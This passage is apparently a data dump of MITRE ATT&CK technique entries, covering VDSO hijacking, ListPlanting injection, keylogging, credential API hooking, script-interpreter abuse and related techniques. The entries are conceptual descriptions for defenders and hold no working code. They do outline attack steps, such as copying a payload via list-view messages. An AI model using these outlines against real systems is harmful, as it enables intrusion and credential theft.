                              'shared object (vdso) hijacking is a method of executing arbitrary code in the address '
                              'space of a separate live process. \n'
                              '\n'
                              'VDSO hijacking involves redirecting calls to dynamically linked shared libraries. '
                              'Memory protections may prevent writing executable code to a process via [Ptrace System '
                              'Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack '
                              'the syscall interface code stubs mapped into a process from the vdso shared object to '
                              'execute syscalls to open and map a malicious shared object. This code can then be '
                              'invoked by redirecting the execution flow of the process via patched memory address '
                              "references stored in a process' global offset table (which store absolute addresses of "
                              'mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace '
                              'VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014)\n'
                              '\n'
                              "Running code in the context of another process may allow access to the process's "
                              'memory, system/network resources, and possibly elevated privileges. Execution via VDSO '
                              'hijacking may also evade detection from security products since the execution is masked '
                              'under a legitimate process.  ',
               'name': 'VDSO Hijacking',
               'platforms': ['Linux']},
 'T1055.015': {'attack_id': 'T1055.015',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may abuse list-view controls to inject malicious code into hijacked '
                              'processes in order to evade process-based defenses as well as possibly elevate '
                              'privileges. ListPlanting is a method of executing arbitrary code in the address space '
                              'of a separate live process. Code executed via ListPlanting may also evade detection '
                              'from security products since the execution is masked under a legitimate process.\n'
                              '\n'
                              'List-view controls are user interface windows used to display collections of '
                              "items.(Citation: Microsoft List View Controls) Information about an application's "
                              "list-view settings are stored within the process' memory in a "
                              '<code>SysListView32</code> control.\n'
                              '\n'
                              'ListPlanting (a form of message-passing "shatter attack") may be performed by copying '
                              'code into the virtual address space of a process that uses a list-view control then '
                              'using that code as a custom callback for sorting the listed items.(Citation: Modexp '
                              'Windows Process Injection) Adversaries must first copy code into the target process’ '
                              'memory space, which can be performed various ways including by directly obtaining a '
                              'handle to the <code>SysListView32</code> child of the victim process window (via '
                              'Windows API calls such as <code>FindWindow</code> and/or <code>EnumWindows</code>) or '
                              'other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.\n'
                              '\n'
                              'Some variations of ListPlanting may allocate memory in the target process but then use '
                              'window messages to copy the payload, to avoid the use of the highly monitored '
                              '<code>WriteProcessMemory</code> function. For example, an adversary can use the '
                              '<code>PostMessage</code> and/or <code>SendMessage</code> API functions to send '
                              '<code>LVM_SETITEMPOSITION</code> and <code>LVM_GETITEMPOSITION</code> messages, '
                              'effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET '
                              'InvisiMole June 2020) \n'
                              '\n'
                              'Finally, the payload is triggered by sending the <code>LVM_SORTITEMS</code> message to '
                              'the <code>SysListView32</code> child of the process window, with the payload within the '
                              'newly allocated buffer passed and executed as the <code>ListView_SortItems</code> '
                              'callback.',
               'name': 'ListPlanting',
               'platforms': ['Windows']},
 'T1056': {'attack_id': 'T1056',
           'categories': ['collection', 'credential-access'],
           'description': 'Adversaries may use methods of capturing user input to obtain credentials or collect '
                          'information. During normal system usage, users often provide credentials to various '
                          'different locations, such as login pages/portals or system dialog boxes. Input capture '
                          'mechanisms may be transparent to the user (e.g. [Credential API '
                          'Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into '
                          'providing input into what they believe to be a genuine service (e.g. [Web Portal '
                          'Capture](https://attack.mitre.org/techniques/T1056/003)).',
           'name': 'Input Capture',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1056.001': {'attack_id': 'T1056.001',
               'categories': ['collection', 'credential-access'],
               'description': 'Adversaries may log user keystrokes to intercept credentials as the user types them. '
                              'Keylogging is likely to be used to acquire credentials for new access opportunities '
                              'when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not '
                              'effective, and may require an adversary to intercept keystrokes on a system for a '
                              'substantial period of time before credentials can be successfully captured. In order to '
                              'increase the likelihood of capturing credentials quickly, an adversary may also perform '
                              'actions such as clearing browser cookies to force users to reauthenticate to '
                              'systems.(Citation: Talos Kimsuky Nov 2021)\n'
                              '\n'
                              'Keylogging is the most prevalent type of input capture, with many different ways of '
                              'intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n'
                              '\n'
                              '* Hooking API callbacks used for processing keystrokes. Unlike [Credential API '
                              'Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API '
                              'functions intended for processing keystroke data.\n'
                              '* Reading raw keystroke data from the hardware buffer.\n'
                              '* Windows Registry modifications.\n'
                              '* Custom drivers.\n'
                              '* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide '
                              'adversaries with hooks into the operating system of network devices to read raw '
                              'keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ',
               'name': 'Keylogging',
               'platforms': ['Windows', 'macOS', 'Linux', 'Network']},
 'T1056.002': {'attack_id': 'T1056.002',
               'categories': ['collection', 'credential-access'],
               'description': 'Adversaries may mimic common operating system GUI components to prompt users for '
                              'credentials with a seemingly legitimate prompt. When programs are executed that need '
                              'additional privileges than are present in the current user context, it is common for '
                              'the operating system to prompt the user for proper credentials to authorize the '
                              'elevated privileges for the task (ex: [Bypass User Account '
                              'Control](https://attack.mitre.org/techniques/T1548/002)).\n'
                              '\n'
                              'Adversaries may mimic this functionality to prompt users for credentials with a '
                              'seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a '
                              'fake installer requiring additional access or a fake malware removal suite.(Citation: '
                              'OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials '
                              'via various languages such as '
                              '[AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You '
                              'Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) '
                              'and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do '
                              'You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: '
                              'Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes '
                              'prompting users for credentials from malicious shell scripts or the command line (i.e. '
                              '[Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing '
                              'credential dialogs)\n'
                              '\n'
                              'Adversaries may also mimic common software authentication requests, such as those from '
                              'browsers or email clients. This may also be paired with user activity monitoring (i.e., '
                              '[Browser Information Discovery](https://attack.mitre.org/techniques/T1217) and/or '
                              '[Application Window Discovery](https://attack.mitre.org/techniques/T1010)) to spoof '
                              'prompts when users are naturally accessing sensitive sites/data.',
               'name': 'GUI Input Capture',
               'platforms': ['macOS', 'Windows', 'Linux']},
 'T1056.003': {'attack_id': 'T1056.003',
               'categories': ['collection', 'credential-access'],
               'description': 'Adversaries may install code on externally facing portals, such as a VPN login page, to '
                              'capture and transmit credentials of users who attempt to log into the service. For '
                              'example, a compromised login page may log provided user credentials before logging the '
                              'user in to the service.\n'
                              '\n'
                              'This variation on input capture may be conducted post-compromise using legitimate '
                              'administrative access as a backup measure to maintain network access through [External '
                              'Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid '
                              'Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial '
                              'compromise by exploitation of the externally facing web service.(Citation: Volexity '
                              'Virtual Private Keylogging)',
               'name': 'Web Portal Capture',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1056.004': {'attack_id': 'T1056.004',
               'categories': ['collection', 'credential-access'],
               'description': 'Adversaries may hook into Windows application programming interface (API) functions to '
                              'collect user credentials. Malicious hooking mechanisms may capture API calls that '
                              'include parameters that reveal user authentication credentials.(Citation: Microsoft '
                              'TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike '
                              '[Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses '
                              'specifically on API functions that include parameters that reveal user credentials. '
                              'Hooking involves redirecting calls to these functions and can be implemented via:\n'
                              '\n'
                              '* **Hooks procedures**, which intercept and execute designated code in response to '
                              'events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook '
                              'Overview)(Citation: Elastic Process Injection July 2017)\n'
                              '* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, '
                              'where pointers to imported API functions are stored.(Citation: Elastic Process '
                              'Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: '
                              'MWRInfoSecurity Dynamic Hooking 2015)\n'
                              '* **Inline hooking**, which overwrites the first bytes in an API function to redirect '
                              'code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge '
                              'Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)\n',
               'name': 'Credential API Hooking',
               'platforms': ['Windows']},
 'T1057': {'attack_id': 'T1057',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get information about running processes on a system. Information '
                          'obtained could be used to gain an understanding of common software/applications running on '
                          'systems within the network. Administrator or otherwise elevated access may provide better '
                          'process details. Adversaries may use the information from [Process '
                          'Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape '
                          'follow-on behaviors, including whether or not the adversary fully infects the target and/or '
                          'attempts specific actions.\n'
                          '\n'
                          'In Windows environments, adversaries could obtain details on running processes using the '
                          '[Tasklist](https://attack.mitre.org/software/S0057) utility via '
                          '[cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via '
                          '[PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes '
                          'can also be extracted from the output of [Native '
                          'API](https://attack.mitre.org/techniques/T1106) calls such as '
                          '<code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the '
                          '<code>ps</code> command. Adversaries may also opt to enumerate processes via `/proc`. \n'
                          '\n'
                          'On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) '
                          'commands such as `show processes` can be used to display current running '
                          'processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)',
           'name': 'Process Discovery',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1059': {'attack_id': 'T1059',
           'categories': ['execution'],
           'description': 'Adversaries may abuse command and script interpreters to execute commands, scripts, or '
                          'binaries. These interfaces and languages provide ways of interacting with computer systems '
                          'and are a common feature across many different platforms. Most systems come with some '
                          'built-in command-line interface and scripting capabilities, for example, macOS and Linux '
                          'distributions include some flavor of [Unix '
                          'Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include '
                          'the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and '
                          '[PowerShell](https://attack.mitre.org/techniques/T1059/001).\n'
                          '\n'
                          'There are also cross-platform interpreters such as '
                          '[Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly '
                          'associated with client applications such as '
                          '[JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual '
                          'Basic](https://attack.mitre.org/techniques/T1059/005).\n'
                          '\n'
                          'Adversaries may abuse these technologies in various ways as a means of executing arbitrary '
                          'commands. Commands and scripts can be embedded in [Initial '
                          'Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure '
                          'documents or as secondary payloads downloaded from an existing C2. Adversaries may also '
                          'execute commands through interactive terminals/shells, as well as utilize various [Remote '
                          'Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote '
                          'Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity '
                          'Assurance - Command History)(Citation: Remote Shell Execution in Python)',
           'name': 'Command and Scripting Interpreter',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network', 'Office 365', 'Azure AD', 'IaaS', 'Google Workspace']},
 'T1059.001': {'attack_id': 'T1059.001',
               'categories': ['execution'],
               'description': 'Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a '
                              'powerful interactive command-line interface and scripting environment included in the '
                              'Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell '
                              'to perform a number of actions, including discovery of information and execution of '
                              'code. Examples include the <code>Start-Process</code> cmdlet which can be used to run '
                              'an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally '
                              'or on a remote computer (though administrator permissions are required to use '
                              'PowerShell to connect to remote systems).\n'
                              '\n'
                              'PowerShell may also be used to download and run executables from the Internet, which '
                              'can be executed from disk or in memory without touching disk.\n'
                              '\n'
                              'A number of PowerShell-based offensive testing tools are available, including '
                              '[Empire](https://attack.mitre.org/software/S0363),  '
                              '[PowerSploit](https://attack.mitre.org/software/S0194), '
                              '[PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github '
                              'PSAttack)\n'
                              '\n'
                              'PowerShell commands/scripts can also be executed without directly invoking the '
                              "<code>powershell.exe</code> binary through interfaces to PowerShell's underlying "
                              '<code>System.Management.Automation</code> assembly DLL exposed through the .NET '
                              'framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan '
                              '2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR '
                              '2014)',
               'name': 'PowerShell',
               'platforms': ['Windows']},
 'T1059.002': {'attack_id': 'T1059.002',
               'categories': ['execution'],
               'description': 'Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting '
                              'language designed to control applications and parts of the OS via inter-application '
                              'messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can '
                              'be sent independently or easily scripted with AppleScript. These events can locate open '
                              'windows, send keystrokes, and interact with almost any open application locally or '
                              'remotely.\n'
                              '\n'
                              'Scripts can be run from the command-line via <code>osascript /path/to/script</code> or '
                              '<code>osascript -e "script here"</code>. Aside from the command line, scripts can be '
                              'executed in numerous ways including Mail rules, Calendar.app alarms, and Automator '
                              'workflows. AppleScripts can also be executed as plain text shell scripts by adding '
                              '<code>#!/usr/bin/osascript</code> to the start of the script file.(Citation: '
                              'SentinelOne AppleScript)\n'
                              '\n'
                              'AppleScripts do not need to call <code>osascript</code> to execute. However, they may '
                              'be executed from within mach-O binaries by using the macOS [Native '
                              'API](https://attack.mitre.org/techniques/T1106)s\xa0<code>NSAppleScript</code>\xa0or\xa0'
                              '<code>OSAScript</code>, both of which execute code independent of the '
                              '<code>/usr/bin/osascript</code> command line utility.\n'
                              '\n'
                              'Adversaries may abuse AppleScript to execute various behaviors, such as interacting '
                              'with an open SSH connection, moving to remote machines, and even presenting users with '
                              'fake dialog boxes. These events cannot start applications remotely (they can start them '
                              "locally), but they can interact with applications if they're already running remotely. "
                              'On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native '
                              'API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require '
                              'compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS '
                              'Red Team) Since this is a scripting language, it can be used to launch more common '
                              'techniques as well such as a reverse shell via '
                              '[Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware '
                              'Targets Macs)',
               'name': 'AppleScript',
               'platforms': ['macOS']},
 'T1059.003': {'attack_id': 'T1059.003',
               'categories': ['execution'],
               'description': 'Adversaries may abuse the Windows command shell for execution. The Windows command '
                              'shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on '
                              'Windows systems. The Windows command prompt can be used to control almost any aspect of '
                              'a system, with various permission levels required for different subsets of commands. '
                              'The command prompt can be invoked remotely via [Remote '
                              'Services](https://attack.mitre.org/techniques/T1021) such as '
                              '[SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\n'
                              '\n'
                              'Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential '
                              'commands to run, as well as normal scripting operations such as conditionals and loops. '
                              'Common uses of batch files include long or repetitive tasks, or the need to run the '
                              'same set of commands on multiple systems.\n'
                              '\n'
                              'Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute '
                              'various commands and payloads. Common uses include '
                              '[cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing '
                              '[cmd](https://attack.mitre.org/software/S0106) interactively with input and output '
                              'forwarded over a command and control channel.',
               'name': 'Windows Command Shell',
               'platforms': ['Windows']},
 'T1059.004': {'attack_id': 'T1059.004',
               'categories': ['execution'],
               'description': 'Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are '
                              'the primary command prompt on Linux and macOS systems, though many variations of the '
                              'Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or '
                              'distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control '
                              'every aspect of a system, with certain commands requiring elevated privileges.\n'
                              '\n'
                              'Unix shells also support scripts that enable sequential execution of commands as well '
                              'as other typical programming operations such as conditionals and loops. Common uses of '
                              'shell scripts include long or repetitive tasks, or the need to run the same set of '
                              'commands on multiple systems.\n'
                              '\n'
                              'Adversaries may abuse Unix shells to execute various commands or payloads. Interactive '
                              'shells may be accessed through command and control channels or during lateral movement '
                              'such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also '
                              'leverage shell scripts to deliver and execute multiple commands on victims or as part '
                              'of payloads used for persistence.',
               'name': 'Unix Shell',
               'platforms': ['macOS', 'Linux', 'Network']},
 'T1059.005': {'attack_id': 'T1059.005',
               'categories': ['execution'],
               'description': 'Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language '
                              'created by Microsoft with interoperability with many Windows technologies such as '
                              '[Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native '
                              'API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although '
                              'tagged as legacy with no planned future evolutions, VB is integrated and supported in '
                              'the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: '
                              'VB Microsoft)\n'
                              '\n'
                              'Derivative languages based on VB have also been created, such as Visual Basic for '
                              'Applications (VBA) and VBScript. VBA is an event-driven programming language built into '
                              'Microsoft Office, as well as several third-party applications.(Citation: Microsoft '
                              'VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate '
                              'the execution of tasks and other functionality on the host. VBScript is a default '
                              'scripting language on Windows hosts and can also be used in place of '
                              '[JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) '
                              'webpages served to Internet Explorer (though most modern browsers do not come with '
                              'VBScript support).(Citation: Microsoft VBScript)\n'
                              '\n'
                              'Adversaries may use VB payloads to execute malicious commands. Common malicious usage '
                              'includes automating execution of behaviors with VBScript or embedding VBA content into '
                              '[Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads '
                              '(which may also involve [Mark-of-the-Web '
                              'Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: '
                              'Default VBS macros Blocking )',
               'name': 'Visual Basic',
               'platforms': ['Windows', 'macOS', 'Linux']},
 'T1059.006': {'attack_id': 'T1059.006',
               'categories': ['execution'],
               'description': 'Adversaries may abuse Python commands and scripts for execution. Python is a very '
                              'popular scripting/programming language, with capabilities to perform many functions. '
                              'Python can be executed interactively from the command-line (via the '
                              '<code>python.exe</code> interpreter) or via scripts (.py) that can be written and '
                              'distributed to different systems. Python code can also be compiled into binary '
                              'executables.(Citation: Zscaler APT31 Covid-19 October 2020)\n'
                              '\n'
                              'Python comes with many built-in packages to interact with the underlying system, such '
                              'as file operations and device I/O. Adversaries can use these libraries to download and '
                              'execute commands or other scripts as well as perform various malicious behaviors.',
               'name': 'Python',
               'platforms': ['Linux', 'Windows', 'macOS']},
 'T1059.007': {'attack_id': 'T1059.007',
               'categories': ['execution'],
               'description': 'Adversaries may abuse various implementations of JavaScript for execution. JavaScript '
                              '(JS) is a platform-independent scripting language (compiled just-in-time at runtime) '
                              'commonly associated with scripts in webpages, though JS can be executed in runtime '
                              'environments outside the browser.(Citation: NodeJS)\n'
                              '\n'
                              'JScript is the Microsoft implementation of the same scripting standard. JScript is '
                              'interpreted via the Windows Script engine and thus integrated with many components of '
                              'Windows such as the [Component Object '
                              'Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML '
                              'Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript '
                              '2007)(Citation: Microsoft Windows Scripts)\n'
                              '\n'
                              'JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, '
                              'included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in '
                              'OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, '
                              'interface with the operating system, and bridge access into the rest of Apple’s '
                              'internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and '
                              '[AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed '
                              'via the command line utility <code>osascript</code>, they can be compiled into '
                              'applications or script files via <code>osacompile</code>, and they can be compiled and '
                              'executed in memory of other programs by leveraging the OSAKit Framework.(Citation: '
                              'Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne '
                              'macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA '
                              'and VSCode)\n'
                              '\n'
                              'Adversaries may abuse various implementations of JavaScript to execute various '
                              'behaviors. Common uses include hosting malicious scripts on websites as part of a '
                              '[Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and '
                              'executing these script files as secondary payloads. Since these payloads are '
                              'text-based, it is also very common for adversaries to obfuscate their content as part '
                              'of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).',
               'name': 'JavaScript',
               'platforms': ['Windows', 'macOS', 'Linux']},
 'T1059.008': {'attack_id': 'T1059.008',
               'categories': ['execution'],
               'description': 'Adversaries may abuse scripting or built-in command line interpreters (CLI) on network '
                              'devices to execute malicious command and payloads. The CLI is the primary means through '
                              'which users and administrators interact with the device in order to view system '
                              'information, modify device operations, or perform diagnostic and administrative '
                              'functions. CLIs typically contain various permission levels required for different '
                              'commands. \n'
                              '\n'
                              'Scripting interpreters automate tasks and extend functionality beyond the command set '
                              'included in the network OS. The CLI and scripting interpreter are accessible through a '
                              'direct console connection, or through remote means, such as telnet or '
                              '[SSH](https://attack.mitre.org/techniques/T1021/004).\n'
                              '\n'
                              'Adversaries can use the network CLI to change how network devices behave and operate. '
                              'The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify '
                              'startup configuration parameters to load malicious system software, or to disable '
                              'security features or logging to avoid detection.(Citation: Cisco Synful Knock '
                              'Evolution)',
               'name': 'Network Device CLI',
               'platforms': ['Network']},
 'T1059.009': {'attack_id': 'T1059.009',
               'categories': ['execution'],
               'description': 'Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud '
                              'environments provide various functionalities and are a feature-rich method for '
                              'programmatic access to nearly all aspects of a tenant. These APIs may be utilized '
                              'through various methods such as command line interpreters (CLIs), in-browser Cloud '
                              'Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure '
                              'for PowerShell(Citation: Microsoft - Azure PowerShell), or software developer kits '
                              '(SDKs) available for languages such as '
                              '[Python](https://attack.mitre.org/techniques/T1059/006).  \n'
                              '\n'
                              'Cloud API functionality may allow for administrative access across all major services '
                              'in a tenant such as compute, storage, identity and access management (IAM), networking, '
                              'and security policies.\n'
                              '\n'
                              'With proper permissions (often via use of credentials such as [Application Access '
                              'Token](https://attack.mitre.org/techniques/T1550/001) and [Web Session '
                              'Cookie](https://attack.mitre.org/techniques/T1550/004)), adversaries may abuse cloud '
                              'APIs to invoke various functions that execute malicious actions. For example, CLI and '
                              'PowerShell functionality may be accessed through binaries installed on cloud-hosted or '
                              'on-premises hosts or accessed through a browser-based cloud shell offered by many cloud '
                              'platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged '
                              'unified environment to use CLI and/or scripting modules hosted as a container in the '
                              'cloud environment.  ',
               'name': 'Cloud API',
               'platforms': ['IaaS', 'Azure AD', 'Office 365', 'SaaS', 'Google Workspace']},
 'T1059.010': {'attack_id': 'T1059.010',
               'categories': ['execution'],
               'description': 'Adversaries may execute commands and perform malicious tasks using AutoIT and '
                              'AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that '
                              'enable users to automate Windows tasks. These automation scripts can be used to perform '
                              'a wide variety of actions, such as clicking on buttons, entering text, and opening and '
                              'closing programs.(Citation: AutoIT)(Citation: AutoHotKey)\n'
                              '\n'
                              'Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code '
                              "on a victim's system. For example, adversaries have used for AHK to execute payloads "
                              'and other modular malware such as keyloggers. Adversaries have also used custom AHK '
                              'files containing embedded malware as '
                              '[Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk '
                              'DarkGate)\n'
                              '\n'
                              'These scripts may also be compiled into self-contained executable payloads '
                              '(`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)',
               'name': 'AutoHotKey & AutoIT',
               'platforms': ['Windows']},
 'T1061': {'attack_id': 'T1061',
           'categories': ['execution'],
           'description': '**This technique has been deprecated. Please use [Remote '
                          'Services](https://attack.mitre.org/techniques/T1021) where appropriate.**\n'
                          '\n'
                          'The Graphical User Interfaces (GUI) is a common way to interact with an operating system. '
                          "Adversaries may use a system's GUI during an operation, commonly through a remote "
                          'interactive session such as [Remote Desktop '
                          'Protocol](https://attack.mitre.org/techniques/T1076), instead of through a [Command and '
                          'Scripting Interpreter](https://attack.mitre.org/techniques/T1059), to search for '
                          'information and execute files via mouse double-click events, the Windows Run command '
                          '(Citation: Wikipedia Run Command), or other potentially difficult to monitor interactions.',
           'name': 'Graphical User Interface',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1062': {'attack_id': 'T1062',
           'categories': ['persistence'],
           'description': '**This technique has been deprecated and should no longer be used.**\n'
                          '\n'
                          'A type-1 hypervisor is a software layer that sits between the guest operating systems and '
                          "system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running "
                          'environment to an operating system. An example of a common hypervisor is Xen. (Citation: '
                          'Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could '
                          'be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide '
                          'its existence from the guest operating system. (Citation: Myers 2007) A malicious '
                          'hypervisor of this nature could be used to persist on systems through interruption.',
           'name': 'Hypervisor',
           'platforms': ['Windows']},
 'T1064': {'attack_id': 'T1064',
           'categories': ['defense-evasion', 'execution'],
           'description': '**This technique has been deprecated. Please use [Command and Scripting '
                          'Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**\n'
                          '\n'
                          'Adversaries may use scripts to aid in operations and perform multiple actions that would '
                          'otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the '
                          'time required to gain access to critical resources. Some scripting languages may be used to '
                          'bypass process monitoring mechanisms by directly interacting with the operating system at '
                          'an API level instead of calling other programs. Common scripting languages for Windows '
                          'include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also '
                          'be in the form of command-line batch scripts.\n'
                          '\n'
                          'Scripts can be embedded inside Office documents as macros that can be set to execute when '
                          'files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and '
                          'other types of spearphishing are opened. Malicious embedded macros are an alternative means '
                          'of execution than software exploitation through [Exploitation for Client '
                          'Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on '
                          'macros being allowed or that the user will accept to activate them.\n'
                          '\n'
                          'Many popular offensive frameworks exist which use forms of scripting for security testers '
                          'and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), '
                          'and PowerSploit (Citation: Powersploit) are three examples that are popular among '
                          'penetration testers for exploit and post-compromise operations and include many features '
                          'for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch '
                          '2014)',
           'name': 'Scripting',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1068': {'attack_id': 'T1068',
           'categories': ['privilege-escalation'],
           'description': 'Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. '
                          'Exploitation of a software vulnerability occurs when an adversary takes advantage of a '
                          'programming error in a program, service, or within the operating system software or kernel '
                          'itself to execute adversary-controlled code. Security constructs such as permission levels '
                          'will often hinder access to information and use of certain techniques, so adversaries will '
                          'likely need to perform privilege escalation to include use of software exploitation to '
                          'circumvent those restrictions.\n'
                          '\n'
                          'When initially gaining access to a system, an adversary may be operating within a lower '
                          'privileged process which will prevent them from accessing certain resources on the system. '
                          'Vulnerabilities may exist, usually in operating system components and software commonly '
                          'running at higher permissions, that can be exploited to gain higher levels of access on the '
                          'system. This could enable someone to move from unprivileged or user level permissions to '
                          'SYSTEM or root permissions depending on the component that is vulnerable. This could also '
                          'enable an adversary to move from a virtualized environment, such as within a virtual '
                          'machine or container, onto the underlying host. This may be a necessary step for an '
                          'adversary compromising an endpoint system that has been properly configured and limits '
                          'other privilege escalation methods.\n'
                          '\n'
                          'Adversaries may bring a signed vulnerable driver onto a compromised machine so that they '
                          'can exploit the vulnerability to execute code in kernel mode. This process is sometimes '
                          'referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June '
                          '2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver '
                          'with files delivered during Initial Access or download it to a compromised system via '
                          '[Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool '
                          'Transfer](https://attack.mitre.org/techniques/T1570).',
           'name': 'Exploitation for Privilege Escalation',
           'platforms': ['Linux', 'macOS', 'Windows', 'Containers']},
 'T1069': {'attack_id': 'T1069',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to discover group and permission settings. This information can '
                          'help adversaries determine which user accounts and groups are available, the membership of '
                          'users in particular groups, and which users and groups have elevated permissions.\n'
                          '\n'
                          'Adversaries may attempt to discover group permission settings in many different ways. This '
                          'data may provide the adversary with information about the compromised environment that can '
                          'be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)',
           'name': 'Permission Groups Discovery',
           'platforms': ['Windows',
                         'Azure AD',
                         'Office 365',
                         'SaaS',
                         'IaaS',
                         'Linux',
                         'macOS',
                         'Google Workspace',
                         'Containers']},
 'T1069.001': {'attack_id': 'T1069.001',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to find local system groups and permission settings. The '
